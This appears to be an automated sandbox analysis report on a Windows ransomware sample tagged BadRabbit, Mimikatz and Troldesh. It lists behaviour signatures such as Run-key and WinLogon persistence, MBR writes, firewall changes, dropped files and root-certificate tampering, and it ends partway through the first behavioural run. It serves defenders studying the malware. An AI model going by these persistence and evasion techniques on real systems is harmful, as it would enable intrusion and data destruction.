Malware Analysis Report

2024-10-19 00:02

Sample ID 220929-pt4essbhbq
Target Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe
SHA256 a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6
Tags
badrabbit mimikatz troldesh bootkit discovery evasion persistence ransomware themida trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6

Threat Level: Known bad

The file Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe was found to be: Known bad.

Malicious Activity Summary

badrabbit mimikatz troldesh bootkit discovery evasion persistence ransomware themida trojan upx

Mimikatz

Troldesh, Shade, Encoder.858

BadRabbit

Modifies WinLogon for persistence

mimikatz is an open source tool to dump credentials on Windows

Checks for common network interception software

Enumerates VirtualBox registry keys

Stops running service(s)

UPX packed file

Disables Task Manager via registry modification

Disables RegEdit via registry modification

Modifies Windows Firewall

Executes dropped EXE

Downloads MZ/PE file

Modifies file permissions

Themida packer

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Modifies WinLogon

Checks installed software on the system

Writes to the Master Boot Record (MBR)

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

NSIS installer

Suspicious use of FindShellTrayWindow

Modifies Internet Explorer settings

Views/modifies file attributes

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Runs net.exe

Modifies Internet Explorer start page

Modifies Control Panel

Suspicious use of SetWindowsHookEx

System policy modification

Kills process with taskkill

Creates scheduled task(s)

Suspicious use of UnmapMainImage

Suspicious use of SendNotifyMessage

Modifies system certificate store

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Script User-Agent

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-09-29 12:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2022-09-29 12:38

Reported

2022-09-29 12:40

Platform

win7-20220812-en

Max time kernel

32s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe"

Signatures

BadRabbit

ransomware badrabbit

Mimikatz

mimikatz

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Troldesh, Shade, Encoder.858

ransomware trojan troldesh

Checks for common network interception software

evasion

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

mimikatz is an open source tool to dump credentials on Windows

Description Indicator Process Target
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\WINDOWS\302746537.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\6AdwCleaner.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Program Files (x86)\antiviruspc2009\avpc2009.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Stops running service(s)

evasion

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\AppData\\Local\\Temp\\[email protected]" C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Checks installed software on the system

discovery

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Legitimate hosting services abused for malware hosting/C2

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\libltdl3.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\antiviruspc2009\__tmp_rar_sfx_access_check_7109121 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\bzip2.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009\avpc2009.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Program Files (x86)\antiviruspc2009 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Program Files (x86)\antiviruspc2009\pthreadVC2.dll C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\cscc.dat C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\dispci.exe C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\__tmp_rar_sfx_access_check_7108169 C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\antivirus-platinum.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\infpub.dat C:\Windows\SysWOW64\rundll32.exe N/A
File created C:\Windows\infpub.dat C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File created C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\COMCTL32.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\MSCOMCTL.OCX C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
File opened for modification C:\Windows\302746537.exe C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\[email protected] N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 564 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1344 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1116 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 1352 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 592 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
PID 564 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.PolyRansom.cwlk-a1d99da15a8902431ab728f50cc47294cdb18fa204d4343f42e49fc84d44bed6.exe C:\Users\Admin\AppData\Local\Temp\[email protected]
